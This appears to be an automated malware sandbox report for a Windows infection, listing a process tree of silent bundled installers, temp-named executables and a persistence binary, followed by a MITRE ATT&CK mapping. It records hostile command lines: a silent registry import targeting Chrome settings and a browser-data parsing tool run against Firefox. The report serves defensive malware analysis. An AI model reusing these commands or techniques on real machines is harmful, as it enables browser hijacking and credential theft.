"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1620,17106706259645514003,18410134020337327782,131072 --lang=en-US --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=2332 /prefetch:1
10⤵
PID:6064

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --field-trial-handle=1620,17106706259645514003,18410134020337327782,131072 --gpu-preferences=MAAAAAAAAADgAAAwAAAAAAAAAAAAAAAAAABgAAAAAAAQAAAAAAAAAAAAAAAAAAAAKAAAAAQAAAAgAAAAAAAAACgAAAAAAAAAMAAAAAAAAAA4AAAAAAAAABAAAAAAAAAAAAAAAAUAAAAQAAAAAAAAAAAAAAAGAAAAEAAAAAAAAAABAAAABQAAABAAAAAAAAAAAQAAAAYAAAA= --mojo-platform-channel-handle=1632 /prefetch:2
10⤵
PID:4232

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1620,17106706259645514003,18410134020337327782,131072 --lang=en-US --extension-process --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=7 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=1980 /prefetch:1
10⤵
PID:5592

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1620,17106706259645514003,18410134020337327782,131072 --lang=en-US --extension-process --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=8 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=1968 /prefetch:1
10⤵
PID:7820

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1620,17106706259645514003,18410134020337327782,131072 --lang=en-US --extension-process --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=2008 /prefetch:1
10⤵
PID:7752

C:\Windows\regedit.exe
regedit /s chrome-set.reg
6⤵
- Runs .reg file with regedit
PID:7740

C:\Users\Admin\AppData\Local\Temp\RarSFX0\parse.exe
parse.exe -f json -b firefox
6⤵
PID:6736

C:\Users\Admin\AppData\Local\Temp\is-GG0S2.tmp\PictureLAb.exe
"C:\Users\Admin\AppData\Local\Temp\is-GG0S2.tmp\PictureLAb.exe" /Verysilent
2⤵
PID:7904

C:\Users\Admin\AppData\Local\Temp\is-D1ARS.tmp\PictureLAb.tmp
"C:\Users\Admin\AppData\Local\Temp\is-D1ARS.tmp\PictureLAb.tmp" /SL5="$4041C,1574549,56832,C:\Users\Admin\AppData\Local\Temp\is-GG0S2.tmp\PictureLAb.exe" /Verysilent
3⤵
PID:7932

C:\Users\Admin\AppData\Local\Temp\is-L5EU6.tmp\Setup.exe
"C:\Users\Admin\AppData\Local\Temp\is-L5EU6.tmp\Setup.exe" /VERYSILENT
4⤵
PID:2092

C:\Users\Admin\AppData\Local\Temp\is-9BATA.tmp\Setup.tmp
"C:\Users\Admin\AppData\Local\Temp\is-9BATA.tmp\Setup.tmp" /SL5="$6046E,442598,358912,C:\Users\Admin\AppData\Local\Temp\is-L5EU6.tmp\Setup.exe" /VERYSILENT
5⤵
PID:2032

C:\Users\Admin\AppData\Local\Temp\is-RJ424.tmp\kkkk.exe
"C:\Users\Admin\AppData\Local\Temp\is-RJ424.tmp\kkkk.exe" /S /UID=lab214
6⤵
PID:4304

C:\Program Files\Windows Sidebar\ZSVCJPFVID\prolab.exe
"C:\Program Files\Windows Sidebar\ZSVCJPFVID\prolab.exe" /VERYSILENT
7⤵
PID:7276

C:\Users\Admin\AppData\Local\Temp\is-M9BIA.tmp\prolab.tmp
"C:\Users\Admin\AppData\Local\Temp\is-M9BIA.tmp\prolab.tmp" /SL5="$305F2,575243,216576,C:\Program Files\Windows Sidebar\ZSVCJPFVID\prolab.exe" /VERYSILENT
8⤵
PID:5700

C:\Users\Admin\AppData\Local\Temp\a9-40d05-752-ff3b2-4e68c4e907280\Mewojiviti.exe
"C:\Users\Admin\AppData\Local\Temp\a9-40d05-752-ff3b2-4e68c4e907280\Mewojiviti.exe"
7⤵
PID:7572

C:\Users\Admin\AppData\Local\Temp\is-GG0S2.tmp\Delta.exe
"C:\Users\Admin\AppData\Local\Temp\is-GG0S2.tmp\Delta.exe" /Verysilent
2⤵
PID:6880

C:\Users\Admin\AppData\Local\Temp\is-1LAKN.tmp\Delta.tmp
"C:\Users\Admin\AppData\Local\Temp\is-1LAKN.tmp\Delta.tmp" /SL5="$5041C,898740,56832,C:\Users\Admin\AppData\Local\Temp\is-GG0S2.tmp\Delta.exe" /Verysilent
3⤵
PID:4964

C:\Users\Admin\AppData\Local\Temp\is-6LJ62.tmp\Setup.exe
"C:\Users\Admin\AppData\Local\Temp\is-6LJ62.tmp\Setup.exe" /VERYSILENT
4⤵
PID:8076

C:\Users\Admin\AppData\Local\Temp\is-GG0S2.tmp\zznote.exe
"C:\Users\Admin\AppData\Local\Temp\is-GG0S2.tmp\zznote.exe" /Verysilent
2⤵
PID:6424

C:\Users\Admin\AppData\Local\Temp\28DE.tmp.exe
C:\Users\Admin\AppData\Local\Temp\28DE.tmp.exe
1⤵
PID:6408

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /c timeout 1
2⤵
PID:5236

C:\Windows\SysWOW64\timeout.exe
timeout 1
3⤵
- Delays execution with timeout.exe
PID:5740

C:\Users\Admin\AppData\Local\Temp\28DE.tmp.exe
"C:\Users\Admin\AppData\Local\Temp\28DE.tmp.exe"
2⤵
PID:7492

C:\Users\Admin\AppData\Local\Temp\28DE.tmp.exe
"C:\Users\Admin\AppData\Local\Temp\28DE.tmp.exe"
2⤵
PID:7504

C:\Users\Admin\AppData\Local\Temp\28DE.tmp.exe
"C:\Users\Admin\AppData\Local\Temp\28DE.tmp.exe"
2⤵
PID:7516

C:\Users\Admin\AppData\Local\Temp\28DE.tmp.exe
"C:\Users\Admin\AppData\Local\Temp\28DE.tmp.exe"
2⤵
PID:7532

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 6408 -s 2472
2⤵
- Program crash
PID:7632

C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
1⤵
PID:4496

C:\Users\Admin\AppData\Local\Temp\5DBA.tmp.exe
C:\Users\Admin\AppData\Local\Temp\5DBA.tmp.exe
1⤵
PID:6988

C:\Windows\SysWOW64\explorer.exe
C:\Windows\SysWOW64\explorer.exe
1⤵
PID:6780

C:\Users\Admin\AppData\Roaming\iwfiare
C:\Users\Admin\AppData\Roaming\iwfiare
1⤵
PID:6724

C:\Users\Admin\AppData\Roaming\esfiare
C:\Users\Admin\AppData\Roaming\esfiare
1⤵
PID:7032

C:\Users\Admin\AppData\Roaming\dwfiare
C:\Users\Admin\AppData\Roaming\dwfiare
1⤵
PID:5456

C:\Windows\explorer.exe
C:\Windows\explorer.exe
1⤵
PID:2152

C:\Windows\SysWOW64\explorer.exe
C:\Windows\SysWOW64\explorer.exe
1⤵
PID:4300

C:\Windows\explorer.exe
C:\Windows\explorer.exe
1⤵
PID:6228

C:\Windows\system32\compattelrunner.exe
C:\Windows\system32\compattelrunner.exe -m:aeinv.dll -f:UpdateSoftwareInventoryW
1⤵
PID:4324

C:\Windows\SysWOW64\explorer.exe
C:\Windows\SysWOW64\explorer.exe
1⤵
PID:6388

C:\Windows\explorer.exe
C:\Windows\explorer.exe
1⤵
PID:6740

C:\Windows\SysWOW64\explorer.exe
C:\Windows\SysWOW64\explorer.exe
1⤵
PID:1760

C:\Windows\explorer.exe
C:\Windows\explorer.exe
1⤵
PID:6616

C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
1⤵
PID:6476

C:\Windows\SysWOW64\explorer.exe
C:\Windows\SysWOW64\explorer.exe
1⤵
PID:6060

C:\Windows\system32\werfault.exe
werfault.exe /h /shared Global\3d9a79b5ff8143058f8dfd42ccf19bc3 /t 7164 /p 4496
1⤵
PID:5800

C:\Users\Admin\AppData\Local\Temp\A18A.exe
C:\Users\Admin\AppData\Local\Temp\A18A.exe
1⤵
PID:4424

C:\Users\Admin\AppData\Roaming\Smart Clock\SmartClock.exe
"C:\Users\Admin\AppData\Roaming\Smart Clock\SmartClock.exe"
2⤵
PID:7872

C:\Users\Admin\AppData\Local\Temp\C715.exe
C:\Users\Admin\AppData\Local\Temp\C715.exe
1⤵
PID:7780

C:\Users\Admin\AppData\Local\Temp\1B60.exe
C:\Users\Admin\AppData\Local\Temp\1B60.exe
1⤵
PID:8144

Network

MITRE ATT&CK Enterprise v6

Initial Access

Execution

Command-Line Interface

T1059

Scheduled Task

T1053

Persistence

Bootkit

T1067

Modify Existing Service

T1031

New Service

T1050

Registry Run Keys / Startup Folder

T1060

Scheduled Task

T1053

Privilege Escalation

New Service

T1050

Scheduled Task

T1053

Defense Evasion

Disabling Security Tools

T1089

File and Directory Permissions Modification

T1222

Impair Defenses

T1562

Install Root Certificate

T1130

Modify Registry

Web Service

T1102

Credential Access

Credentials in Files

T1081

Discovery

Peripheral Device Discovery

T1120

Query Registry

Remote System Discovery

T1018

Software Discovery

T1518

System Information Discovery